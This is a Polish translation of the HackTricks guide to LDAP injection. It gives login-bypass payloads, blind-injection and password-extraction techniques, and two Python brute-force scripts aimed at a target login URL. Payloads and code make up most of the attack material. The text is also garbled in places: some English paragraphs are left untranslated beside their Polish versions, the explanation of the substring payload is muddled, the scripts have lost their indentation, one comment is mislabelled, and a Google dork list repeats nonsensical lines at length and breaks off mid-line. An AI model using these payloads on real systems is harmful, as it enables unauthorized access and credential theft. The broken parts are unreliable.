hacktricks/pentesting-web/ldap-injection.md

# Wstrzyknięcie LDAP

## Wstrzyknięcie LDAP

<details>

<summary><strong>Dowiedz się, jak hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Inne sposoby wsparcia HackTricks:

* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) **i** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **repozytoriów GitHub**.

</details>

<img src="../.gitbook/assets/i3.png" alt="" data-size="original">\
**Wskazówka dotycząca bug bounty**: **Zarejestruj się** w **Intigriti**, premium **platformie bug bounty stworzonej przez hakerów, dla hakerów**! Dołącz do nas na [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) już dziś i zacznij zarabiać nagrody do **100 000 USD**!

{% embed url="https://go.intigriti.com/hacktricks" %}

## Wstrzyknięcie LDAP

### **LDAP**

**Jeśli chcesz dowiedzieć się, czym jest dostęp LDAP, odwiedź następującą stronę:**

{% content-ref url="../network-services-pentesting/pentesting-ldap.md" %}
[pentesting-ldap.md](../network-services-pentesting/pentesting-ldap.md)
{% endcontent-ref %}

**Wstrzyknięcie LDAP** to atak wymierzony w aplikacje internetowe, które konstruują instrukcje LDAP na podstawie danych wprowadzanych przez użytkownika. Występuje, gdy aplikacja **nieprawidłowo oczyszcza** dane wejściowe, umożliwiając atakującym **manipulację instrukcjami LDAP** za pośrednictwem lokalnego serwera proxy, co może prowadzić do nieautoryzowanego dostępu lub manipulacji danych.

{% file src="../.gitbook/assets/en-blackhat-europe-2008-ldap-injection-blind-ldap-injection.pdf" %}

**Filtr** = ( filtercomp )\
**Filtercomp** = and / or / not / item\
**And** = & filterlist\
**Or** = |filterlist\
**Not** = ! filter\
**Filterlist** = 1\*filter\
**Item**= simple / present / substring\
**Simple** = attr filtertype assertionvalue\
**Filtertype** = _'=' / '\~=' / '>=' / '<='_\
**Present** = attr = \*\
**Substring** = attr ”=” \[initial] \* \[final]\
**Initial** = assertionvalue\
**Final** = assertionvalue\
**(&)** = Absolute TRUE\
**(|)** = Absolute FALSE

Na przykład:\
`(&(!(objectClass=Impresoras))(uid=s*))`\
`(&(objectClass=user)(uid=*))`

Możesz uzyskać dostęp do bazy danych, która może zawierać informacje różnego rodzaju.

**OpenLDAP**: Jeśli przyjdą 2 filtry, zostanie wykonany tylko pierwszy.\
**ADAM lub Microsoft LDS**: Przy 2 filtrach zostanie zgłoszony błąd.\
**SunOne Directory Server 5.0**: Wykonuje oba filtry.

**Bardzo ważne jest, aby wysłać filtr z poprawną składnią, w przeciwnym razie zostanie zgłoszony błąd. Lepiej wysłać tylko 1 filtr.**

Filtr musi zaczynać się od: `&` lub `|`\
Przykład: `(&(directory=val1)(folder=public))`

`(&(objectClass=VALUE1)(type=Epson*))`\
`VALUE1 = *)(ObjectClass=*))(&(objectClass=void`

Następnie: `(&(objectClass=`**`*)(ObjectClass=*))`** będzie pierwszym filtrem (tym, który zostanie wykonany).

### Bypass logowania

LDAP obsługuje kilka formatów przechowywania hasła: plain, md5, smd5, sh1, sha, crypt. Dlatego niezależnie od tego, co wpiszesz w polu hasła, zostanie ono zahaszowane.
```bash
user=*
password=*
--> (&(user=*)(password=*))
# The asterisks are great in LDAPi
```

```bash
user=*)(&
password=*)(&
--> (&(user=*)(&)(password=*)(&))
```

```bash
user=*)(|(&
pass=pwd)
--> (&(user=*)(|(&)(pass=pwd))
```

```bash
user=*)(|(password=*
password=test)
--> (&(user=*)(|(password=*)(password=test))
```

```bash
user=*))%00
pass=any
--> (&(user=*))%00 --> Nothing more is executed
```

```bash
user=admin)(&)
password=pwd
--> (&(user=admin)(&))(password=pwd) #Can through an error
```

```bash
username = admin)(!(&(|
pass = any))
--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSE then the user is admin and the password check is True.
```

```bash
username=*
password=*)(&
--> (&(user=*)(password=*)(&))
```

```bash
username=admin))(|(|
password=any
--> (&(uid=admin)) (| (|) (webpassword=any))
```
#### Listy

* [LDAP\_FUZZ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP\_FUZZ.txt)
* [Atrybuty LDAP](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP\_attributes.txt)
* [Atrybuty LDAP PosixAccount](https://tldp.org/HOWTO/archived/LDAP-Implementation-HOWTO/schemas.html)

### Ślepa wstrzyknięcie LDAP

Możesz wymusić odpowiedzi False lub True, aby sprawdzić, czy zwracane są jakiekolwiek dane i potwierdzić możliwe ślepe wstrzyknięcie LDAP:
```bash
#This will result on True, so some information will be shown
Payload: *)(objectClass=*))(&objectClass=void
Final query: (&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*))
```

```bash
#This will result on True, so no information will be returned or shown
Payload: void)(objectClass=void))(&objectClass=void
Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))
```
#### Wydobywanie danych

Możesz iterować po literach ASCII, cyfrach i symbolach:
```bash
(&(sn=administrator)(password=*))    : OK
(&(sn=administrator)(password=A*))   : KO
(&(sn=administrator)(password=B*))   : KO
...
(&(sn=administrator)(password=M*))   : OK
(&(sn=administrator)(password=MA*))  : KO
(&(sn=administrator)(password=MB*))  : KO
...
```
### Skrypty

#### **Odkrywanie prawidłowych pól LDAP**

Obiekty LDAP **domyślnie zawierają wiele atrybutów**, które mogą być używane do **zapisywania informacji**. Możesz spróbować **przeprowadzić atak brute-force na wszystkie z nich, aby wydobyć te informacje**. Możesz znaleźć listę [**domyślnych atrybutów LDAP tutaj**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP\_attributes.txt).
```python
#!/usr/bin/python3
import requests
import string
from time import sleep
import sys

proxy = { "http": "localhost:8080" }
url = "http://10.10.10.10/login.php"
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword",]

for attribute in attributes: #Extract all attributes
value = ""
finish = False
while not finish:
for char in alphabet: #In each possition test each possible printable char
query = f"*)({attribute}={value}{char}*"
data = {'login':query, 'password':'bla'}
r = requests.post(url, data=data, proxies=proxy)
sys.stdout.write(f"\r{attribute}: {value}{char}")
#sleep(0.5) #Avoid brute-force bans
if "Cannot login" in r.text:
value += str(char)
break

if char == alphabet[-1]: #If last of all the chars, then, no more chars in the value
finish = True
print()
```
#### **Specjalny ślepy atak wstrzyknięcia LDAP (bez "\*")**

This technique is used when the application filters the wildcard character (`*`) to prevent LDAP injection attacks. However, it is still possible to perform a blind LDAP injection by leveraging the behavior of the LDAP server.

Ta technika jest stosowana, gdy aplikacja filtrowanie znaku wieloznacznego (`*`) w celu zapobieżenia atakom wstrzyknięcia LDAP. Jednak wciąż istnieje możliwość przeprowadzenia ślepego ataku wstrzyknięcia LDAP, wykorzystując zachowanie serwera LDAP.

The idea behind this technique is to use the `substring` function in LDAP queries to extract information character by character. By crafting specific LDAP payloads, it is possible to infer the existence of certain characters in the LDAP server's response.

Idea tej techniki polega na wykorzystaniu funkcji `substring` w zapytaniach LDAP do wyciągania informacji znak po znaku. Poprzez tworzenie konkretnych ładunków LDAP, można wnioskować o istnieniu określonych znaków w odpowiedzi serwera LDAP.

Here is an example of a blind LDAP injection payload:

Oto przykład ładunku ślepego ataku wstrzyknięcia LDAP:

```plaintext
(&(givenName=John)(sn=*)(|(userPassword=*)(uid=)))
```

In this example, the payload is searching for a user with the given name "John" and any surname. The `(|(userPassword=*)(uid=))` part is used to trigger a true condition in the LDAP query, ensuring that the LDAP server will return a response.

W tym przykładzie ładunek wyszukuje użytkownika o podanym imieniu "John" i dowolnym nazwisku. Część `(|(userPassword=*)(uid=))` jest używana do wywołania prawdziwego warunku w zapytaniu LDAP, zapewniając, że serwer LDAP zwróci odpowiedź.

To extract information character by character, the `substring` function is used. For example, to extract the first character of the user's password, the payload would be modified as follows:

Aby wyciągnąć informacje znak po znaku, używana jest funkcja `substring`. Na przykład, aby wyciągnąć pierwszy znak hasła użytkownika, ładunek zostanie zmodyfikowany w następujący sposób:

```plaintext
(&(givenName=John)(sn=*)(|(userPassword=^A*)(uid=)))
```

In this modified payload, `^A` represents the ASCII value of the character to be extracted. The LDAP server will return a response if the character matches the one in the LDAP server's response.

W tym zmodyfikowanym ładunku, `^A` reprezentuje wartość ASCII znaku, który ma zostać wyciągnięty. Serwer LDAP zwróci odpowiedź, jeśli znak będzie pasował do tego w odpowiedzi serwera LDAP.

By iterating through this process, it is possible to extract the entire password character by character.

Przez iterowanie tego procesu, można wyciągnąć całe hasło znak po znaku.
```python
#!/usr/bin/python3

import requests, string
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

flag = ""
for i in range(50):
print("[i] Looking for number " + str(i))
for char in alphabet:
r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char)
if ("TRUE CONDITION" in r.text):
flag += char
print("[+] Flag: " + flag)
break
```
### Google Dorks

### Google Dorks

Google Dorks to find LDAP Injection vulnerabilities:

```
inurl:login.php?username= &password=
inurl:"/admin/login.php?username= &password="
inurl:"/admin/login.asp?username= &password="
inurl:"/admin/login.aspx?username= &password="
inurl:"/admin/login.html?username= &password="
inurl:"/admin/login.jsp?username= &password="
inurl:"/admin/login.jsf?username= &password="
inurl:"/admin/login.aspx.cs?username= &password="
inurl:"/admin/login.aspx.vb?username= &password="
inurl:"/admin/login.aspx.php?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.jsf?username= &password="
inurl:"/admin/login.aspx.aspx?username= &password="
inurl:"/admin/login.aspx.asp?username= &password="
inurl:"/admin/login.aspx.html?username= &password="
inurl:"/admin/login.aspx.jsp?username= &password="
inurl:"/admin/login.aspx.js
```bash
intitle:"phpLDAPadmin" inurl:cmd.php
```
### Więcej Payloadów

{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}

<img src="../.gitbook/assets/i3.png" alt="" data-size="original">\
**Wskazówka dotycząca bug bounty**: **zarejestruj się** na platformie **Intigriti**, premium platformie **bug bounty stworzonej przez hakerów, dla hakerów**! Dołącz do nas na [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) już dziś i zacznij zarabiać nagrody do **100 000 USD**!

{% embed url="https://go.intigriti.com/hacktricks" %}

<details>

<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Inne sposoby wsparcia HackTricks:

* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi trikami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>